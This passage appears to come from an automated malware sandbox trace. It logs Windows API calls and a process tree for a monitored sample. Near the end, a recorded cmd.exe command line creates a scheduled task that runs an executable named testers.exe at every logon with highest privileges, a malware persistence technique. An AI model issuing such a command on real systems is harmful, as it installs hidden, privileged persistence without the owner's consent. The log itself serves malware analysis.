[0244.710] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0244.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfd0 [0244.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef70 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f128 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfd0 | out: hHeap=0x8a0000) returned 1 [0244.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfd0 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed40 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1920 [0244.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef98 [0244.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfd0 | out: hHeap=0x8a0000) returned 1 [0244.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.711] LockWindowUpdate (hWndLock=0x0) returned 0 [0244.711] DestroyWindow (hWnd=0x1014c) returned 1 [0244.712] NtdllDefWindowProc_W () returned 0x0 [0244.714] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0244.714] Shell_NotifyIconW (dwMessage=0x2, lpData=0x87f6e8) returned 1 [0244.751] PostQuitMessage (nExitCode=0) [0244.751] GetMessageW (in: lpMsg=0x87fd84, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x87fd84) returned 0 [0244.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8a88 | out: hHeap=0x8a0000) returned 1 [0244.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8e90 | out: hHeap=0x8a0000) returned 1 [0244.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a95b8 | out: hHeap=0x8a0000) returned 1 [0244.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b91f0 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9568 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5838 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9220 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9208 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9238 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9250 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9268 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9590 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8d58 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8a40 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9540 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b85d8 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8a28 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a94f0 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5828 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9178 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9160 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9190 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b91a8 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9518 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9478 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b57f8 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b90b8 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b90a0 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b90d0 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8a58 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5808 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9100 | out: hHeap=0x8a0000) returned 1 [0244.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b90e8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a94c8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5818 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9130 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9118 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9148 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a94a0 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8650 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b57c8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8fe0 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8fc8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8a10 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b57d8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9010 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8ff8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9028 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8ab8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b57e8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9058 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9040 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9070 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9088 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9450 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8ad0 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5788 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8ec0 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8ea8 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9be548 | out: hHeap=0x8a0000) returned 1 [0244.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5798 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8ef0 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8ed8 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8f08 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9428 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b57a8 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8f38 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8f20 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8f50 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923600 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b57b8 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8f80 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8f68 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8f98 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8fb0 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9400 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b85f0 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5748 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8d88 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8d70 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9be510 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5758 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8db8 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8da0 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8dd0 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a93b0 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5768 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8e00 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8de8 | out: hHeap=0x8a0000) returned 1 [0244.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8e18 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9be580 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5778 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8e48 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8e30 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8e60 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8e78 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a93d8 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8aa0 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5708 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8668 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b86c8 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9be4d8 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5718 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8c80 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8c68 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8c98 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9360 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5728 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8cc8 | out: hHeap=0x8a0000) returned 1 [0244.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b8cb0 | out: hHeap=0x8a0000) returned 1 [0244.796] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0244.797] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x30d40, fWinIni=0x2 | out: pvParam=0x30d40) returned 1 [0244.809] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0244.811] OleUninitialize () [0244.813] DestroyCursor (hCursor=0x2013f) returned 0 [0244.816] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x89fdbc | out: phModule=0x89fdbc) returned 0 [0244.816] ExitProcess (uExitCode=0x0) Thread: id = 140 os_tid = 0x364 Thread: id = 141 os_tid = 0x35c Thread: id = 151 os_tid = 0x6e4 Thread: id = 154 os_tid = 0x5dc Thread: id = 184 os_tid = 0x7f8 Thread: id = 192 os_tid = 0x5cc Thread: id = 194 os_tid = 0x5c0 Thread: id = 207 os_tid = 0x5d8 Thread: id = 208 os_tid = 0x344 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2488f000" os_pid = "0x374" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x1d4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cf39" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 30 os_tid = 0x6e4 Thread: id = 31 os_tid = 0x6c8 Thread: id = 32 os_tid = 0x428 Thread: id = 33 os_tid = 0x42c Thread: id = 34 os_tid = 0x534 Thread: id = 35 os_tid = 0x4e4 Thread: id = 36 os_tid = 0x4b4 Thread: id = 37 os_tid = 0x49c Thread: id = 38 os_tid = 0x498 Thread: id = 39 os_tid = 0x490 Thread: id = 40 os_tid = 0x1c8 Thread: id = 41 os_tid = 0x120 Thread: id = 42 os_tid = 0xc8 Thread: id = 43 os_tid = 0x3f8 Thread: id = 44 os_tid = 0x3ec Thread: id = 45 os_tid = 0x3a0 Thread: id = 46 os_tid = 0x39c Thread: id = 47 os_tid = 0x398 Thread: id = 48 os_tid = 0x394 Thread: id = 49 os_tid = 0x380 Thread: id = 50 os_tid = 0x378 Thread: id = 51 os_tid = 0x710 Thread: id = 52 os_tid = 0x714 Thread: id = 53 os_tid = 0x72c Thread: id = 54 os_tid = 0x730 Thread: id = 55 os_tid = 0x738 Thread: id = 56 os_tid = 0x73c Thread: id = 57 os_tid = 0x744 Thread: id = 58 os_tid = 0x748 Thread: id = 59 os_tid = 0x758 Thread: id = 60 os_tid = 0x764 Thread: id = 61 os_tid = 0x768 Thread: id = 62 os_tid = 0x770 Thread: id = 63 os_tid = 0x774 Thread: id = 64 os_tid = 0x794 Thread: id = 65 os_tid = 0x79c Thread: id = 66 os_tid = 0x7a0 Thread: id = 67 os_tid = 0x7a4 Thread: id = 68 os_tid = 0x7a8 Thread: id = 69 os_tid = 0x7ac Thread: id = 70 os_tid = 0x7b8 Thread: id = 88 os_tid = 0x7c4 Thread: id = 89 os_tid = 0x4a4 Thread: id = 90 os_tid = 0x43c Thread: id = 91 os_tid = 0x494 Thread: id = 92 os_tid = 0x4a8 Thread: id = 93 os_tid = 0x4b8 Thread: id = 94 os_tid = 0x4dc Thread: id = 183 os_tid = 0x3d8 Thread: id = 217 os_tid = 0x218 Thread: id = 218 os_tid = 0x510 Thread: id = 219 os_tid = 0x500 Thread: id = 220 os_tid = 0x644 Thread: id = 221 os_tid = 0x67c Thread: id = 222 os_tid = 0x6d8 Thread: id = 223 os_tid = 0x4fc Thread: id = 224 os_tid = 0x668 Thread: id = 225 os_tid = 0x134 Thread: id = 226 os_tid = 0x1e4 Thread: id = 227 os_tid = 0x728 Thread: id = 228 os_tid = 0x6f0 Thread: id = 265 os_tid = 0x274 Thread: id = 327 os_tid = 0x69c Thread: id = 328 os_tid = 0x2b0 Thread: id = 329 os_tid = 0x7c8 Thread: id = 330 os_tid = 0x6b0 Thread: id = 331 os_tid = 0x7a0 Thread: id = 332 os_tid = 0x7fc Thread: id = 333 os_tid = 0x24c Thread: id = 358 os_tid = 0x4dc Thread: id = 359 os_tid = 0x4d8 Thread: id = 360 os_tid = 0x110 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xdb35000" os_pid = "0x254" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1d4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e88" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 71 os_tid = 0x7bc Thread: id = 72 os_tid = 0x7b4 Thread: id = 73 os_tid = 0x70c Thread: id = 74 os_tid = 0x31c Thread: id = 75 os_tid = 0x2ac Thread: id = 76 os_tid = 0x2a4 Thread: id = 77 os_tid = 0x2a0 Thread: id = 78 os_tid = 0x288 Thread: id = 79 os_tid = 0x284 Thread: id = 80 os_tid = 0x280 Thread: id = 81 os_tid = 0x27c Thread: id = 82 os_tid = 0x278 Thread: id = 83 os_tid = 0x26c Thread: id = 84 os_tid = 0x264 Thread: id = 85 os_tid = 0x260 Thread: id = 86 os_tid = 0x258 Thread: id = 182 os_tid = 0x248 Thread: id = 296 os_tid = 0x210 Process: id = "12" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x5e38000" os_pid = "0x334" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 95 os_tid = 0x344 Thread: id = 96 os_tid = 0x32c Thread: id = 97 os_tid = 0x5c8 Thread: id = 98 os_tid = 0x324 Thread: id = 99 os_tid = 0x348 Thread: id = 100 os_tid = 0x34c Thread: id = 101 os_tid = 0x350 Process: id = "13" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x70cc000" os_pid = "0x37c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x13c" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 102 os_tid = 0x4cc Thread: id = 103 os_tid = 0x7b0 Thread: id = 104 os_tid = 0x740 Thread: id = 105 os_tid = 0x734 Thread: id = 106 os_tid = 0x728 Thread: id = 107 os_tid = 0x720 Thread: id = 108 os_tid = 0x704 Thread: id = 109 os_tid = 0x6ec Thread: id = 110 os_tid = 0x6d4 Thread: id = 111 os_tid = 0x6b4 Thread: id = 112 os_tid = 0x614 Thread: id = 113 os_tid = 0x5fc Thread: id = 114 os_tid = 0x5bc Thread: id = 115 os_tid = 0x5b0 Thread: id = 116 os_tid = 0x5ac Thread: id = 117 os_tid = 0x5a0 Thread: id = 118 os_tid = 0x560 Thread: id = 119 os_tid = 0x50c Thread: id = 120 os_tid = 0x4f8 Thread: id = 121 os_tid = 0x4c8 Thread: id = 122 os_tid = 0x4c4 Thread: id = 123 os_tid = 0x4c0 Thread: id = 124 os_tid = 0x4bc Thread: id = 125 os_tid = 0x4ac Thread: id = 126 os_tid = 0x4a8 Thread: id = 127 os_tid = 0x4a4 Thread: id = 128 os_tid = 0x4a0 Thread: id = 129 os_tid = 0x48c Thread: id = 130 os_tid = 0x404 Thread: id = 131 os_tid = 0x154 Thread: id = 132 os_tid = 0x294 Thread: id = 133 os_tid = 0x174 Thread: id = 134 os_tid = 0x148 Thread: id = 135 os_tid = 0x18c Thread: id = 136 os_tid = 0x3a8 Thread: id = 137 os_tid = 0x3a4 Thread: id = 245 os_tid = 0xc0 Thread: id = 295 os_tid = 0x224 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6e04e000" os_pid = "0x318" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6dc" cmd_line = "C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], 